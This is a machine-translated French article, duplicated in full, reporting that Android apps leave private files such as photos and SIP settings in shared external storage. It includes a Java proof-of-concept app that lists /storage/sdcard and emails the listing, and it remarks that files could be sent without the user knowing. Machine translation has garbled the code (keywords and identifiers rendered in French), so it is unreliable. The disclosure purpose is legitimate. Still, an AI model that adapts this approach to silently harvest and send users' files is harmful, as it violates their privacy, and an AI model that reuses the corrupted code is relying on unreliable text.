L'application Android, les développeurs ne se soucient pas des utilisateurs de données de sécurité, ce qui provoque la fuite de données
par Habrahabr Utilisateur
C'est un secret de polichinelle que les applications Android sont très vulnérables aux fuites de données, principalement en raison de leurs développeurs. Encore un autre fait qui confirme qu'il a été récemment décrit à habrahabr.ru - un russe de ressources, populaire auprès des experts de l'informatique, en particulier avec les développeurs d'application.
Sur son propre smartphone, l'auteur du post remarqué répertoires et de fichiers d'applications, qui a longtemps été supprimé, dans /storage/sdcard, et s'est demandé si une application Android a été en mesure de lire les fichiers temporaires à partir d'une autre application.
Quels fichiers temporaires et pourquoi devrions-nous nous en occuper? Ces fichiers peuvent contenir vos photos, enregistrements de données téléphoniques, de la base de données de vos agendas et beaucoup d'autres informations à vous personnellement jugent privée et ne veulent pas la rendre disponible à tous.
Dans Android, les fichiers temporaires de toutes les applications sont stockées dans /storage/sdcard. Quand une application est supprimée, ces temps restent - si le développeur n'a pas de soins pour les supprimer dans ce cas.
Un gestionnaire de fichiers téléchargés à partir de google.le jeu sera de vous permettre de lire les fichiers temporaires de toutes les applications installées sur l'appareil Android, y compris les non chiffré des enregistrements de conversations téléphoniques, de messagers et de téléphonie sip applications, l'historique de navigation des navigateurs, des sélections de joueurs, divers info sur les réseaux sociaux, des notes personnelles sur les choses à faire à partir de journaux intimes, et cetera.
Simplement envie d': les fichiers temporaires de whatsapp, un populaire messenger avec plus de 33 000 000 d'utilisateurs, sont également stockés dans /storage/sdcard; ce qui est plus, seuls les messages sont cryptés, les photos ne sont pas. Whatsapp est qu'un exemple parmi tant d'autres; presque toutes les applications populaires stocker vos données personnelles dans /storage/sdcard/%appName% et toute autre application a accès à ce répertoire.
Par exemple, ce messager stocke des photos envoyés à vous dans le répertoire accessible à toutes les applications sur votre appareil, qui ont la permission d'accéder à l'espace de stockage:
Et populaire, un client sip magasins réglages de votre compte sip. Dans le pire des cas, ces données peuvent être volées d'obtenir un accès non autorisé:
Bien, ça veut dire que quelqu'un peut dérober des photos à partir de votre appareil Android? L'auteur a écrit un joli petit programme en Java qui a envoyé à la structure de /de stockage/sdcard à une adresse e-mail spécifiée.
Le code source de l'application que les e-mails de la structure de répertoire /stockage/sdcard:
-----------------
-----------------
Vous entrez l'adresse e-mail, et de l'application e-mails de la structure de répertoire /stockage/sdcard; comme vous le savez, cela peut être fait sans demande de mail et pas seulement la structure de répertoire, mais aussi les fichiers peuvent être envoyés. Les applications google.jouer est rare d'être vérifié très soigneusement. Malheureusement, c'est un outil très efficace pour les commerçants, car ils veulent toujours savoir autant que possible sur leurs utilisateurs. Inutile de dire que les données personnelles peuvent être obtenus de cette manière.
Et voici la lettre que vous recevrez; il contient le contenu de /storage/sdcard, c'est à dire il y aura tous les fichiers et dossiers à partir des applications installées sur votre appareil:
Afficher votre répertoire /stockage/sdcard en utilisant le gestionnaire de fichiers pour android; en option, la même chose est disponible lorsque vous connectez votre appareil à un PC /téléphone; si vous utilisez les messagers, les réseaux sociaux, un planificateur de tâches, voir ce qui peut en théorie tout développeur android voir, qui a écrit android.la permission.READ_EXTERNAL_STORAGE dans le manifeste.
Donc, la conclusion est claire: beaucoup de ceux qui développent des applications comme les réseaux sociaux, la messagerie instantanée, la téléphonie sip clients, des journaux intimes, ne se soucient pas de la sécurité des données des utilisateurs.
Date de publication:
Sur son propre smartphone, l'auteur du post remarqué répertoires et de fichiers d'applications, qui a longtemps été supprimé, dans /storage/sdcard, et s'est demandé si une application Android a été en mesure de lire les fichiers temporaires à partir d'une autre application.
Quels fichiers temporaires et pourquoi devrions-nous nous en occuper? Ces fichiers peuvent contenir vos photos, enregistrements de données téléphoniques, de la base de données de vos agendas et beaucoup d'autres informations à vous personnellement jugent privée et ne veulent pas la rendre disponible à tous.
Dans Android, les fichiers temporaires de toutes les applications sont stockées dans /storage/sdcard. Quand une application est supprimée, ces temps restent - si le développeur n'a pas de soins pour les supprimer dans ce cas.
Un gestionnaire de fichiers téléchargés à partir de google.le jeu sera de vous permettre de lire les fichiers temporaires de toutes les applications installées sur l'appareil Android, y compris les non chiffré des enregistrements de conversations téléphoniques, de messagers et de téléphonie sip applications, l'historique de navigation des navigateurs, des sélections de joueurs, divers info sur les réseaux sociaux, des notes personnelles sur les choses à faire à partir de journaux intimes, et cetera.
Simplement envie d': les fichiers temporaires de whatsapp, un populaire messenger avec plus de 33 000 000 d'utilisateurs, sont également stockés dans /storage/sdcard; ce qui est plus, seuls les messages sont cryptés, les photos ne sont pas. Whatsapp est qu'un exemple parmi tant d'autres; presque toutes les applications populaires stocker vos données personnelles dans /storage/sdcard/%appName% et toute autre application a accès à ce répertoire.
Par exemple, ce messager stocke des photos envoyés à vous dans le répertoire accessible à toutes les applications sur votre appareil, qui ont la permission d'accéder à l'espace de stockage:
Et populaire, un client sip magasins réglages de votre compte sip. Dans le pire des cas, ces données peuvent être volées d'obtenir un accès non autorisé:
Bien, ça veut dire que quelqu'un peut dérober des photos à partir de votre appareil Android? L'auteur a écrit un joli petit programme en Java qui a envoyé à la structure de /de stockage/sdcard à une adresse e-mail spécifiée.
Le code source de l'application que les e-mails de la structure de répertoire /stockage/sdcard:
-----------------
package android.com.testapp;
import android.contenu.Intention;
import android.os.De l'environnement;
import android.de soutien.v7.app.AppCompatActivity;
import android.os.Faisceau;
import android.vue.Vue;
import android.widget de.Bouton;
import android.widget de.EditText;
import android.widget de.Toast;
importer java.io.Fichier;
importer java.util.Date;
public class MainActivity extends AppCompatActivity {
Bouton emailButton;
EditText e-mail;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R. layout.activity_main);
email = (EditText) findViewById(R. id.e-mail);
emailButton = (Button) findViewById(R. id.emailButton);
emailButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
getFileStrucure();
}
});
}
protected void getFileStrucure(){
Filewalker fw = new Filewalker();
fw.à pied(new File(de l'Environnement.getExternalStorageDirectory().getAbsolutePath()));
}
privé de classe Filewalker {
private int count = 0;
private String sked = "";
public void pied(Dossier racine) {
count++;
Le fichier[] liste = root.listFiles();
pour (Fichier f : liste) {
si (f.isDirectory()) {
sked += "heure:" + new Date(f.lastModified()) + ", dir: "+ f.getAbsoluteFile() + "\n";
marche(f);
}
else {
sked += "heure:" + new Date(f.lastModified()) + ", taille: "+ f.length() + ", " + f.getAbsoluteFile() + "\n";
}
}
count--;
if (count == 0) {
sendMail(sked);
}
}
}
protected void sendMail(Chaîne de sked) {
Intent i = new Intent(Intent.ACTION_SEND);
j'.setType("message/rfc822");
j'.putExtra(Intention.EXTRA_EMAIL, new String[]{email.getText().toString()});
j'.putExtra(Intention.EXTRA_SUBJECT, "android structure de stockage");
j'.putExtra(Intention.EXTRA_TEXT, sked);
try {
startActivity(Intent.createChooser(i, "Envoyer un mail..."));
} catch (android.contenu.ActivityNotFoundException ex) {
Toast.makeText(getcontexteapplication(), "Il n'y a pas de clients de messagerie installé." Toast.LENGTH_SHORT).show();
}
}
}
-----------------
Vous entrez l'adresse e-mail, et de l'application e-mails de la structure de répertoire /stockage/sdcard; comme vous le savez, cela peut être fait sans demande de mail et pas seulement la structure de répertoire, mais aussi les fichiers peuvent être envoyés. Les applications google.jouer est rare d'être vérifié très soigneusement. Malheureusement, c'est un outil très efficace pour les commerçants, car ils veulent toujours savoir autant que possible sur leurs utilisateurs. Inutile de dire que les données personnelles peuvent être obtenus de cette manière.
Et voici la lettre que vous recevrez; il contient le contenu de /storage/sdcard, c'est à dire il y aura tous les fichiers et dossiers à partir des applications installées sur votre appareil:
Afficher votre répertoire /stockage/sdcard en utilisant le gestionnaire de fichiers pour android; en option, la même chose est disponible lorsque vous connectez votre appareil à un PC /téléphone; si vous utilisez les messagers, les réseaux sociaux, un planificateur de tâches, voir ce qui peut en théorie tout développeur android voir, qui a écrit android.la permission.READ_EXTERNAL_STORAGE dans le manifeste.
Donc, la conclusion est claire: beaucoup de ceux qui développent des applications comme les réseaux sociaux, la messagerie instantanée, la téléphonie sip clients, des journaux intimes, ne se soucient pas de la sécurité des données des utilisateurs.
Date de publication:
